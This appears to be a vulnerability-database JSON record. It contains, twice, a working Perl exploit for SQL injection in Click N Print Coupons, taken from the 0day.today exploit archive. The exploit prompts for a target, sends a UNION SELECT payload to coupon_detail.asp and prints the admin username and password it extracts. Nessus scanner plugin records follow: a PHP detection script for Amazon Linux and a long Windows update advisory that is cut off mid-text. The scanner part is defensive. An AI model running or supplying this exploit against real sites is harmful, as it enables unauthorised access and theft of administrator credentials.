{"published": "2006-12-30T00:00:00", "id": "1337DAY-ID-1344", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:33:41", "bulletin": {"published": "2006-12-30T00:00:00", "id": "1337DAY-ID-1344", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.5, "modified": "2016-04-20T00:33:41", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/"}}, "hash": "fb6512c255a4d7b0d2a9fe669b0cb31d88072fbbfef60618ad7ed08f5f82a195", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:33:41", "edition": 1, "title": "Click N Print Coupons <= V2006.01 (key) Remote SQL Injection Exploit", "href": "http://0day.today/exploit/description/1344", "modified": "2006-12-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/1344", "references": [], "reporter": "ajann", "sourceData": "====================================================================\r\nClick N Print Coupons <= V2006.01 (key) Remote SQL Injection Exploit\r\n====================================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit\r\n#[Coded by : ajann\r\n#[Author : ajann\r\n#[Contact : :(\r\n#[$$ : $9.95\r\n#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #..\r\n#[.. : ajann,Turkey\r\n\r\n# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201\r\n\r\n\r\nuse IO::Socket;\r\nif(@ARGV < 1){\r\nprint \"\r\n[========================================================================\r\n[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit\r\n[// Usage: exploit.pl [target]\r\n[// Example: exploit.pl victim.com\r\n[// Example: exploit.pl victim.com\r\n[// Vuln&Exp : ajann\r\n[========================================================================\r\n\";\r\nexit();\r\n}\r\n#Local variables\r\n$server = $ARGV[0];\r\n$server =~ s/(http:\\/\\/)//eg;\r\n$host = \"http://\".$server;\r\n$port = \"80\";\r\n$file = \"/coupon_detail.asp?key=\";\r\n\r\nprint \"Script <DIR> : \";\r\n$dir = <STDIN>;\r\nchop ($dir);\r\n\r\nif ($dir =~ /exit/){\r\nprint \"-- Exploit Failed[You Are Exited] \\n\";\r\nexit();\r\n}\r\n\r\nif ($dir =~ /\\//){}\r\nelse {\r\nprint \"-- Exploit Failed[No DIR] \\n\";\r\nexit();\r\n }\r\n\r\nprint \"User <ID> : \";\r\n$ID = <STDIN>;\r\nchop ($ID);\r\n\r\nif ($ID =~ /exit/){\r\nprint \"-- Exploit Failed[You Are Exited] \\n\";\r\nexit();\r\n}\r\n\r\n$len=length($ID);\r\n\r\nif ($len == 1){}\r\nelse {\r\nprint \"-- Exploit Failed[No User Id] \\n\";\r\nexit();\r\n }\r\n\r\n$target = \"-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20\".$ID;\r\n$target = $host.$dir.$file.$target;\r\n\r\n#Writing data to socket\r\nprint \"+**********************************************************************+\\n\";\r\nprint \"+ Trying to connect: $server\\n\";\r\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\r\nprint $socket \"GET $target HTTP/1.1\\n\";\r\nprint $socket \"Host: $server\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"+ Connected!...\\n\";\r\n#Getting\r\nwhile($answer = <$socket>) {\r\nif ($answer =~ /color=\\\"#FF0000\\\">(.*?)<\\/font>/){\r\nprint \"+ Exploit succeed! Getting admin information.\\n\";\r\nprint \"+ ---------------- +\\n\";\r\nprint \"+ Username: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /<font size=\\\"4\\\"><b>(.*?)<br>/){\r\nprint \"+ Password: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /Syntax error/) { \r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit(); \r\n}\r\n\r\nif ($answer =~ /Internal Server Error/) {\r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit(); \r\n}\r\n }\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "ab0aea870a6356f0528e894f51858613", "key": "sourceHref"}, {"hash": "ae0b111bb136686e31e6d78ccb8980e2", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4e2155cb973b8c6c29060c2bec732b33", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "797f15120db2f4e731b1998f6c8ee45d", "key": "published"}, {"hash": "797f15120db2f4e731b1998f6c8ee45d", "key": "modified"}, {"hash": "df97504d0ef8c9b6fae61cf60ff80eae", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "f6c4156c1a1d9f8e9c70658fb3a1028b", "key": "sourceData"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "fd789c89fd3efdc86557d1927cadbd59b1537503bfa370589af7f1502779e79f", "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2018-04-14T19:50:34"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1289", "RHSA-2019:1149", "RHSA-2019:1147", "RHSA-2019:0796"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876337", "OPENVAS:1361412562310876336", "OPENVAS:1361412562310876339", "OPENVAS:1361412562310876343", "OPENVAS:1361412562310876344", "OPENVAS:1361412562310876335", "OPENVAS:1361412562310876347", "OPENVAS:1361412562310876345", "OPENVAS:1361412562310876341", "OPENVAS:1361412562310876340"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1344-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1739-1:3959D"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/RAILS_DOUBLETAP_FILE_READ"]}], "modified": "2018-04-14T19:50:34"}, "vulnersScore": 1.1}, "type": "zdt", "lastseen": "2018-04-14T19:50:34", "edition": 2, "title": "Click N Print Coupons <= V2006.01 (key) Remote SQL Injection Exploit", "href": "https://0day.today/exploit/description/1344", "modified": "2006-12-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/1344", "references": [], "reporter": "ajann", "sourceData": "====================================================================\r\nClick N Print Coupons <= V2006.01 (key) Remote SQL Injection Exploit\r\n====================================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit\r\n#[Coded by : ajann\r\n#[Author : ajann\r\n#[Contact : :(\r\n#[$$ : $9.95\r\n#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #..\r\n#[.. : ajann,Turkey\r\n\r\n# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201\r\n\r\n\r\nuse IO::Socket;\r\nif(@ARGV < 1){\r\nprint \"\r\n[========================================================================\r\n[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit\r\n[// Usage: exploit.pl [target]\r\n[// Example: exploit.pl victim.com\r\n[// Example: exploit.pl victim.com\r\n[// Vuln&Exp : ajann\r\n[========================================================================\r\n\";\r\nexit();\r\n}\r\n#Local variables\r\n$server = $ARGV[0];\r\n$server =~ s/(http:\\/\\/)//eg;\r\n$host = \"http://\".$server;\r\n$port = \"80\";\r\n$file = \"/coupon_detail.asp?key=\";\r\n\r\nprint \"Script <DIR> : \";\r\n$dir = <STDIN>;\r\nchop ($dir);\r\n\r\nif ($dir =~ /exit/){\r\nprint \"-- Exploit Failed[You Are Exited] \\n\";\r\nexit();\r\n}\r\n\r\nif ($dir =~ /\\//){}\r\nelse {\r\nprint \"-- Exploit Failed[No DIR] \\n\";\r\nexit();\r\n }\r\n\r\nprint \"User <ID> : \";\r\n$ID = <STDIN>;\r\nchop ($ID);\r\n\r\nif ($ID =~ /exit/){\r\nprint \"-- Exploit Failed[You Are Exited] \\n\";\r\nexit();\r\n}\r\n\r\n$len=length($ID);\r\n\r\nif ($len == 1){}\r\nelse {\r\nprint \"-- Exploit Failed[No User Id] \\n\";\r\nexit();\r\n }\r\n\r\n$target = \"-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20\".$ID;\r\n$target = $host.$dir.$file.$target;\r\n\r\n#Writing data to socket\r\nprint \"+**********************************************************************+\\n\";\r\nprint \"+ Trying to connect: $server\\n\";\r\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\r\nprint $socket \"GET $target HTTP/1.1\\n\";\r\nprint $socket \"Host: $server\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"+ Connected!...\\n\";\r\n#Getting\r\nwhile($answer = <$socket>) {\r\nif ($answer =~ /color=\\\"#FF0000\\\">(.*?)<\\/font>/){\r\nprint \"+ Exploit succeed! Getting admin information.\\n\";\r\nprint \"+ ---------------- +\\n\";\r\nprint \"+ Username: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /<font size=\\\"4\\\"><b>(.*?)<br>/){\r\nprint \"+ Password: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /Syntax error/) { \r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit(); \r\n}\r\n\r\nif ($answer =~ /Internal Server Error/) {\r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit(); \r\n}\r\n }\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "426ddfcea3d322b407238bf76d69a965", "key": "href"}, {"hash": "797f15120db2f4e731b1998f6c8ee45d", "key": "modified"}, {"hash": "797f15120db2f4e731b1998f6c8ee45d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ae0b111bb136686e31e6d78ccb8980e2", "key": "reporter"}, {"hash": "b01b5bffcb1ebc10d6ac76abd8766cd5", "key": "sourceData"}, {"hash": "ad21bde868d6ecc999814a6f1b0bdda1", "key": "sourceHref"}, {"hash": "df97504d0ef8c9b6fae61cf60ff80eae", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"nessus": [{"lastseen": "2019-12-13T06:38:50", "bulletinFamily": "scanner", "description": "In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below\n7.3.11 in certain configurations of FPM setup it is possible to cause\nFPM module to write past allocated buffers into the space reserved for\nFCGI protocol data, thus opening the possibility of remote code\nexecution.(CVE-2019-11043)", "modified": "2019-12-02T00:00:00", "id": "AL2_ALAS-2019-1344.NASL", "href": "https://www.tenable.com/plugins/nessus/130470", "published": "2019-11-04T00:00:00", "title": "Amazon Linux 2 : php (ALAS-2019-1344)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2019-1344.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130470);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"ALAS\", value:\"2019-1344\");\n\n script_name(english:\"Amazon Linux 2 : php (ALAS-2019-1344)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below\n7.3.11 in certain configurations of FPM setup it is possible to cause\nFPM module to write past allocated buffers into the space reserved for\nFCGI protocol data, thus opening the possibility of remote code\nexecution.(CVE-2019-11043)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2019-1344.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"php-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-bcmath-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-cli-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-common-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-dba-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-debuginfo-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-devel-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-embedded-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-enchant-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-fpm-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-gd-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-intl-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-ldap-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-mbstring-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-mysqlnd-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-odbc-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-pdo-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-pgsql-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-process-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-pspell-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-recode-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-snmp-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-soap-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-xml-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-xmlrpc-5.4.16-46.amzn2.0.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-14T09:20:17", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4519990\nor cumulative update 4520005. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520005.NASL", "href": "https://www.tenable.com/plugins/nessus/129722", "published": "2019-10-08T00:00:00", "title": "KB4519990: Windows 8.1 and Windows Server 2012 R2 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129722);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4519990\");\n script_xref(name:\"MSKB\", value:\"4520005\");\n script_xref(name:\"MSFT\", value:\"MS19-4519990\");\n script_xref(name:\"MSFT\", value:\"MS19-4520005\");\n\n script_name(english:\"KB4519990: Windows 8.1 and Windows Server 2012 R2 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4519990\nor cumulative update 4520005. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the 